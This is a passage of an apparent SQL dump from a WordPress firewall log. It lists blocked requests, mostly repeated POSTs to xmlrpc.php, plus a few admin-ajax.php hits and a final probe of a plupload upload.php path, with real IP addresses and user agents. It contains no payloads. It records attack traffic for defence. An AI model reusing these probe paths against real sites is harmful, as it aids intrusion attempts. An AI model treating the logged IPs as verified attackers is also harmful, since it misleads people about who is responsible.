Firefox\\/58.0\"}','ofRVqc2viC0T5S3XYZOIB41p',0,1681627418.6665,582,'','POST',403,0,515,0,1,'',0),('107.6.142.143',1795591823,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','6dqkPhH5CS2lALwBRUXtnT1m',0,1681627433.8210,574,'','POST',403,0,515,0,1,'',0),('80.88.87.150',1347966870,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','FfKYSXpexiI90Tm4jCBqElth',0,1681627435.1758,570,'','POST',403,0,515,0,1,'',0),('5.255.98.122',100622970,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','0JCbi8DNQc9zyr5PvR6osVAH',0,1681627436.8945,571,'','POST',403,0,515,0,1,'',0),('185.110.66.2',3111010818,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','Xps0ZrLI6W4TtgbGhR98wjnq',0,1681628802.5268,4073,'','POST',403,0,515,0,1,'',0),('141.94.87.67',2371770179,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','DwNuv4J31qVnHaGO7xfkpdIT',0,1681628804.1996,2400,'','POST',403,0,515,0,1,'',0),('202.61.232.109',3393054829,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','0tL58blofTu2JZNDiBQynsCk',0,1681628803.2030,4168,'','POST',403,0,515,0,1,'',0),('144.126.132.168',2424210600,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.116 Safari\\/537.36\"}','zCxoQA5flMGTmiSkpVXEL2Hh',0,1681628812.1433,1035,'','POST',403,0,515,0,1,'',0),('81.169.144.135',1370067079,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko\\/20100101 Firefox\\/79.0\"}','5FH6WiY0hUNduOATv3lraCck',0,1681628812.5890,1002,'','POST',403,0,515,0,1,'',0),('89.163.145.59',1503891771,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','RIDnTbXhH36wKOF7y4A1g8q0',0,1681628815.9253,571,'','POST',403,0,515,0,1,'',0),('46.38.249.174',774306222,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','UxJyG9hsP64N8OSCdDBtKZVe',0,1681628822.6599,632,'','POST',403,0,515,0,1,'',0),('185.2.5.90',3103917402,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','bfmgTyqzXBlvMLC8uGnH4QU5',0,1681628824.9022,582,'','POST',403,0,515,0,1,'',0),('142.93.230.17',2388518417,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','0FMY62BevcikWuzSD1XLNCbf',0,1681628830.5511,588,'','POST',403,0,515,0,1,'',0),('101.0.73.122',1694517626,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','W2946XkZbULCDBEz5thq7xQ8',0,1681628833.1426,748,'','POST',403,0,515,0,1,'',0),('178.62.105.205',2990434765,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','qvahsXLfN1bciMzTmwkn6JUO',0,1681628836.1503,572,'','POST',403,0,515,0,1,'',0),('107.190.132.194',1807647938,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-N960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','FV72h5SlwI1JBKgx9eniysQd',0,1681628841.0338,559,'','POST',403,0,515,0,1,'',0),('178.32.187.122',2988489594,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','BvzMXyD0qNhb7sPWHTpfQU5l',0,1681631728.9654,4144,'','POST',403,0,515,0,1,'',0),('72.167.222.62',1218960958,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','m9aRfV3WFS56PYky7vKAbdgh',0,1681631735.7835,580,'','POST',403,0,515,0,1,'',0),('62.109.150.204',1047369420,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\"}','dvfP8CNKJuZA7eE2rgTIhXip',0,1681631738.7798,641,'','POST',403,0,515,0,1,'',0),('173.231.207.89',2917650265,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','x6aGVfWJuPyFUQCI4Oe2nck9',0,1681631744.9683,570,'','POST',403,0,515,0,1,'',0),('199.59.90.4',3342555652,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','qo0WVM6Jmpt9eIZvfA3j4aKr',0,1681631745.8646,589,'','POST',403,0,515,0,1,'',0),('3.109.255.227',57540579,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','xXo7O15Uqwmg0yrJYCPcbNWT',0,1681631751.6506,557,'','POST',403,0,515,0,1,'',0),('208.109.61.155',3496820123,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','wylkIuDmnVoz8xQh2F0qAb7G',0,1681631756.3864,622,'','POST',403,0,515,0,1,'',0),('207.55.248.19',3476551699,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','t1jw5dazgNEOXAcT307Y2FmW',0,1681631757.5028,558,'','POST',403,0,515,0,1,'',0),('103.154.184.198',1738193094,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','V59S6ykbaxHfihCqNgjQ32Xe',0,1681631759.3173,562,'','POST',403,0,515,0,1,'',0),('149.129.227.62',2508317502,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','MG5gu40dtyIp6FznresafTKR',0,1681631760.5995,578,'','POST',403,0,515,0,1,'',0),('103.171.180.165',1739306149,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','jQFeRSbuJoHVx3w8PitdlfLz',0,1681635486.8409,4028,'','POST',403,0,515,0,1,'',0),('199.250.222.107',3355106923,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','i6tYRjgXJ4S7wl1IPGFZosxE',0,1681635489.8628,1509,'','POST',403,0,515,0,1,'',0),('178.32.201.69',2988493125,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','2MNfmtEc1VFroUb4y3JO5sBK',0,1681635491.6235,621,'','POST',403,0,515,0,1,'',0),('116.118.49.117',1953902965,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','GjpuUr1KkBCXsic9fVDlNQbT',0,1681635497.9689,563,'','POST',403,0,515,0,1,'',0),('54.37.121.239',908425711,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','813wKUVLiosdf7k92ThBvJtR',0,1681635504.8443,586,'','POST',403,0,515,0,1,'',0),('5.9.59.22',84491030,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-G960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','gyb7XILHGDCtqVmw2rs4eEWF',0,1681635509.0183,619,'','POST',403,0,515,0,1,'',0),('92.205.2.176',1556939440,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','mpscPQaeJEH0LTt1SV9y6zCd',0,1681635515.7634,615,'','POST',403,0,515,0,1,'',0),('125.227.111.133',2112057221,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-N960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','Qqe5jkU8OsXToArGJHYV2bm6',0,1681635525.5979,588,'','POST',403,0,515,0,1,'',0),('188.68.47.117',3158585205,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','oWMCbnUTKjLwmf3lB7svYgVO',0,1681635532.5725,567,'','POST',403,0,515,0,1,'',0),('139.162.58.251',2342664955,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\"}','0Oc6ACFZPslBVo512jgWuwYm',0,1681637131.4611,1690,'','POST',403,0,515,0,1,'',0),('103.117.180.72',1735767112,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','qdC01KQXlYrtjp8RB2G9mVsD',0,1681637129.6387,3737,'','POST',403,0,515,0,1,'',0),('47.243.171.230',804498406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','t0lTeLYwKiRhxBgAW3zNjaCU',0,1681637133.2519,1172,'','POST',403,0,515,0,1,'',0),('198.54.126.2',3325459970,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','Np2lvagO786Xucd59CoxP3ni',0,1681637139.1903,585,'','POST',403,0,515,0,1,'',0),('194.31.87.110',3256833902,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','GiIdPmc87UJjDzVq563nNrKC',0,1681637143.4844,990,'','POST',403,0,515,0,1,'',0),('183.181.91.159',3082115999,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','TXykR2fSnPvxq4VheIOpJEDo',0,1681637143.9452,912,'','POST',403,0,515,0,1,'',0),('92.204.239.51',1556934451,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','KpSYVcJ5Gs3aI0QXA8NqUjob',0,1681637155.8950,640,'','POST',403,0,515,0,1,'',0),('95.167.178.158',1604825758,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','USmI8uJKCTcsMBAQ26Dvpyg0',0,1681637159.2128,652,'','POST',403,0,515,0,1,'',0),('66.42.49.228',1110061540,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','tL7RqHwjs8zfDy0NYQOh2xVi',0,1681637160.3074,1516,'','POST',403,0,515,0,1,'',0),('46.38.249.174',774306222,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko\\/20050716 Firefox\\/1.0.6\"}','FDTuptxYydC1LP3fbIsUX0mv',0,1681637167.0858,563,'','POST',403,0,515,0,1,'',0),('62.102.148.158',1046910110,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','1CcZTftlPewdAyzmLNkh9i7r',0,1681637365.0068,2797,'','POST',403,0,515,0,1,'',0),('185.182.56.150',3115726998,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','30m4MGdF1JcfjQ6SgHZhBrpx',0,1681638677.1346,3838,'','POST',403,0,515,0,1,'',0),('14.225.192.104',249675880,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.141 Safari\\/537.36\"}','qVbNh9RUzsBOtSx06IjvceMi',0,1681638679.8674,1487,'','POST',403,0,515,0,1,'',0),('51.91.29.218',861609434,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','06DPmtWZa7Vu5gYfQ2sq14dC',0,1681638682.0241,560,'','POST',403,0,515,0,1,'',0),('34.126.99.60',578708284,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','2T5WMQDloAKRhudZEJ6a0Nkc',0,1681638683.3191,622,'','POST',403,0,515,0,1,'',0),('189.203.144.160',3184234656,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','ua0jdGlISisOWYKBhy5zRUef',0,1681638691.2970,582,'','POST',403,0,515,0,1,'',0),('41.193.5.58',700515642,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','Y98OR6BExc17rMPdIKThsWFo',0,1681638704.2599,584,'','POST',403,0,515,0,1,'',0),('103.42.56.253',1730820349,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','zW5oDj0EiymqBnK2lJ83ShR1',0,1681638706.6979,588,'','POST',403,0,515,0,1,'',0),('103.159.84.218',1738495194,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','5vTLb4daMD7hnsrzu8B9q0pk',0,1681638710.6818,555,'','POST',403,0,515,0,1,'',0),('103.117.180.72',1735767112,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','GYt0IuMvZ6S9gTf7WBPRw4KU',0,1681638716.8677,875,'','POST',403,0,515,0,1,'',0),('43.155.103.11',731604747,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','ISwZFH37EjVUMph0Jr9OeX5Y',0,1681638717.4634,748,'','POST',403,0,515,0,1,'',0),('34.87.13.139',576130443,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','z10OENyxLMKu9rtopDsbh4AB',0,1681638721.0246,612,'','POST',403,0,515,0,1,'',0),('159.203.161.65',2680922433,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','S0Wtiuv3nRCQV9dx2N5MIjPG',0,1681641483.5837,2360,'','POST',403,0,515,0,1,'',0),('92.204.239.51',1556934451,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','UvsoHAcFu8LlKZdbTtD2whgp',0,1681641484.8807,1996,'','POST',403,0,515,0,1,'',0),('43.155.116.117',731608181,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','OewTloCfuRcx8V1NqrIPWjs9',0,1681641485.7886,1419,'','POST',403,0,515,0,1,'',0),('95.167.178.158',1604825758,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','ru3At7n6KVRJbWImTeUQZaOv',0,1681641490.1214,572,'','POST',403,0,515,0,1,'',0),('128.199.67.142',2160542606,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','VhrPFDqogz1SGACMnufWTjtR',0,1681641495.0347,1235,'','POST',403,0,515,0,1,'',0),('95.167.178.158',1604825758,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','Tz3vtjWYeBNLCUD7VGXnlr6S',0,1681641495.3412,1125,'','POST',403,0,515,0,1,'',0),('128.199.67.142',2160542606,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','ZUfGcluT8tBy2OP1rWFiE9bV',0,1681641506.3711,1487,'','POST',403,0,515,0,1,'',0),('103.154.184.198',1738193094,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','UYVp1idbleLz3gINMO42WmAX',0,1681641506.5511,1520,'','POST',403,0,515,0,1,'',0),('47.104.167.76',795387724,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','FKJmthYWSwBUcXQ9sAP31bjZ',0,1681641508.0585,651,'','POST',403,0,515,0,1,'',0),('91.225.138.200',1541507784,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','1T6tBlKf4ywN7UxC2ISH8Lgd',0,1681641513.7117,546,'','POST',403,0,515,0,1,'',0),('202.61.232.109',3393054829,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','0RDuNZAwnU81TIyfJogGadHX',0,1681641517.5969,968,'','POST',403,0,515,0,1,'',0),('213.152.186.24',3583556120,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','hG4uAnHNyFgdtcJ5XmM8Io3k',0,1681642268.1963,1314,'','POST',403,0,515,0,1,'',0),('184.75.221.203',3091979723,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','BgvuDyGjzpWaYfH4ZwUSx3eJ',0,1681643761.9690,1506,'','POST',403,0,515,0,1,'',0),('103.171.90.148',1739283092,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko\\/20100101 Firefox\\/79.0\"}','A7eEomUkYdK5a4iFyjWGnqvL',0,1681644170.1102,2241,'','POST',403,0,515,0,1,'',0),('141.138.169.247',2374674935,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','HQ3tuzkCal4XvqgmfncxSwOE',0,1681644174.0799,563,'','POST',403,0,515,0,1,'',0),('74.208.233.41',1255205161,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','kAjBPqrShemiwVOIGl3XE2Nx',0,1681644180.0830,594,'','POST',403,0,515,0,1,'',0),('199.59.90.4',3342555652,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:36.0) Gecko\\/20100101 Firefox\\/36.0\"}','5jfzoh9V2MO3DvFTSy6sAWlN',0,1681644182.6462,546,'','POST',403,0,515,0,1,'',0),('199.59.90.4',3342555652,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','4GZN2HUdsyiRwQ8MOuJXYjg6',0,1681644185.3374,611,'','POST',403,0,515,0,1,'',0),('51.178.146.199',867340999,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','9AsDV6xCqaWTkOc8zUXuI7lJ',0,1681644186.8320,567,'','POST',403,0,515,0,1,'',0),('137.184.59.110',2310552430,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','ygoA0MuJz8kFVClUXbxwepIr',0,1681644190.9717,590,'','POST',403,0,515,0,1,'',0),('199.59.90.4',3342555652,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','bumEiQ1BKkr3cCoOlWnghAvX',0,1681644194.8738,401,'','POST',404,0,515,0,1,'',0),('149.248.50.72',2516070984,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','s3GuQ4pvCIEiLM0DP7KNbqFH',0,1681644197.2871,564,'','POST',403,0,515,0,1,'',0),('13.38.131.186',220627898,'','http://cmdev-site1.com//cmdev-site1.com/wp-admin/admin-ajax.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/75.0.3770.143 YaBrowser\\/19.7.3.172 Yowser\\/2.5 Safari\\/537.36\"}','b5SVkZ7ptnI3XFWBK2YxjqHC',0,1681644559.2551,1393,'','GET',403,0,700,0,1,'',0),('13.38.131.186',220627898,'','https://cmdev-site1.com//cmdev-site1.com/wp-admin/admin-ajax.php','','{\"1\":\"Mozilla\\/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko\\/20100402 Iceweasel\\/3.6.3 (like Firefox\\/3.6.3) GTB7.0\"}','5Wkw4I3yFLeKR7ZhNX8gbaDO',0,1681644610.5931,2071,'','GET',403,0,700,0,1,'',0),('103.171.180.165',1739306149,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','lS5dARUIstwocLaM3zGKiY9Z',0,1681647746.7389,565,'','POST',403,0,515,0,1,'',0),('213.152.186.168',3583556264,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','bzvqGY69l7nBseWHocagiCkR',0,1681648103.5191,3829,'','POST',403,0,515,0,1,'',0),('194.38.23.179',3257276339,'','http://cmdev-site1.com/public/plugins/plupload/examples/upload.php','','{\"1\":\"ALittle 